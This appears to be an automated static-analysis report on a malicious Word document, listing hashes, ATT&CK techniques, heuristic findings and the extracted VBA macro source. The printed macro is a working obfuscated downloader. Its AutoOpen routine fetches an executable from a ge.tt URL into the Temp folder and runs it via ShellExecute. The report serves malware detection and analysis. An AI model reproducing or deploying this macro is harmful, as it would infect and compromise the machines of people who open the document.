Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 20d6962bdd62d7f4…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 54.5 KB
Created: 2015-03-15 03:16:00
Authoring application: Microsoft Office Word
First seen: 2015-06-23
MD5: 4475df0c3ad2e0d711beac7b0d443d59
SHA-1: cbd49ec60eb03ba59ee15616de681d3b8d0605fc
SHA-256: 20d6962bdd62d7f4d33c250b135b31362195cefa60664170cc1e5fe7c47cd30a
Risk Score: 238

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1071.001 Application Layer Protocol: Web Protocols
  • T1105 Ingress Tool Transfer

The sample contains VBA macros that reference the URLDownloadToFile API, indicating an intent to download and execute a second-stage payload. The 'Enable Macros to view full content' lure is a common technique for getting the user to bypass Office macro security settings. The presence of AutoOpen and ShellExecute API references further supports the malicious nature of the document.

Heuristics (9)

  • Reference to URLDownloadToFile API [critical] SC_STR_URLDOWNLOAD
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD
    Matched line in script:
        Private Declare PtrSafe Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
        Sub AutoOpen()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Matched line in script:
        JkFjuexVzhTjcr = Environ("Te" & "mp")
  • Reference to ShellExecute API [high] SC_STR_SHELLEXEC
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4702 bytes
SHA-256: c1b51a441ba10041621879bc41698edaf8915bd63943f6d81c2fb9cb42b137ae

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
#If VBA7 Then


Private Declare PtrSafe Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long

    Private Declare PtrSafe Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal JQ1Vb72t6bIXtK As Long, ByVal JRzHJklNNL94gD As String, ByVal J8hIi9FwLiiVlr As String, ByVal Jznz68mkaaJQQS As Long, ByVal JxJfdLyE4jCnl5 As Long) As Long
    
    Private Declare PtrSafe Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" ( _
  ByVal lpBuffer As String, _
  nSize As Long) As Long
  
Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
  
  
  Private Declare PtrSafe Function FindWindow Lib "user32" _
   Alias "FindWindowA" _
   (ByVal lpClassName As String, _
   ByVal lpWindowName As String) As Long

Private Declare PtrSafe Function GetClassName Lib "user32" _
   Alias "GetClassNameA" _
   (ByVal hWnd As Long, _
   ByVal lpClassName As String, _
   ByVal nMaxCount As Long) As Long
  
#Else

Public Declare Function GetDriveType Lib "kernel32" _
    Alias "GetDriveTypeA" (ByVal nDrive As String) As Integer

Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long

    Private Declare Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal JJJWuPD4NeO4WF As Long, ByVal JYURvmkth8tnbT As String, ByVal JaRjJOa6JYniCR As String, ByVal JZKNefyicowIGO As Long, ByVal JNydFEvaD5IuXm As Long) As Long
     
     Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" ( _
  ByVal lpBuffer As String, _
  nSize As Long) As Long
  
  Private Declare Function FindWindow Lib "user32" _
   Alias "FindWindowA" _
   (ByVal lpClassName As String, _
   ByVal lpWindowName As String) As Long
   Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long


Private Declare Function GetClassName Lib "user32" _
   Alias "GetClassNameA" _
   (ByVal hWnd As Long, _
   ByVal lpClassName As String, _
   ByVal nMaxCount As Long) As Long
  
#End If
    
    
 Sub apiuse1()
    Dim lresult As Long
  Dim sBuffer As String
  Dim lSize As Long
  lSize = 256
  sBuffer = Space(lSize)
   lresult = GetComputerName(sBuffer, nSize)
   If lresult <> 0 Then
     sBuffer = Left$(sBuffer, nSize)
  Else
   End If
   End Sub
    

    
   
    
Sub AutoOpen()

 Dim sBuffer As String
  Dim nSize As Long
  Dim http As String: http = "htt" & "p://"
  Dim lresult As Long
  JRYfcuLs5uEk2Z = http & "ge.tt/api/1/files/67jsb5E2/0/blob?download"

  nSize = 2048
   JkFjuexVzhTjcr = Environ("Te" & "mp")
    JBIWUgHTF3bla = JRYfcuLs5uEk2Z
  sBuffer = Space(248)
  lresult = GetComputerName(sBuffer, nSize)

    JIgLb2TdFZHCB = JkFjuexVzhTjcr & "\" & "JTf1LX5cOyJQ7i" & ".exe"

usedownapi JBIWUgHTF3bla, JIgLb2TdFZHCB
  
End Sub



Sub usedownapi(ByVal JBIWUgHTF3bzla As String, ByVal JIgLb2TdFZHCaB As String)
     OSILlzCwXBSr 0, JBIWUgHTF3bzla, JIgLb2TdFZHCaB, 0, 0
     userunapi JIgLb2TdFZHCaB
End Sub

Public Sub GetClassNameFromTitle()
   Dim sInput As String
   Dim hWnd As Long
   Dim lpClassName As String
   Dim nMaxCount As Long
   Dim lresult As Long
   ' pad the return buffer for GetClassName
   nMaxCount = 256
   lpClassName = Space(nMaxCount)
   ' Note: must be an exact match
   sInput = InputBox("Enter the exact window title:")
   ' No validation is done as this is a debug window utility
   hWnd = FindWindow(vbNullString, sInput)
   ' Get the class name of the window, again, no validation
   lresult = GetClassName(hWnd, lpClassName, nMaxCount)
   Debug.Print "Window: " & sInput
   Debug.Print "Class name: " & Left$(lpClassName, lresult)
End Sub


Sub userunapi(ByVal JBIWUgHTF3bzla As String)
    ShellExecute 0, "open", JBIWUgHTF3bzla, "", vbNullString, vbNormalFocus
End Sub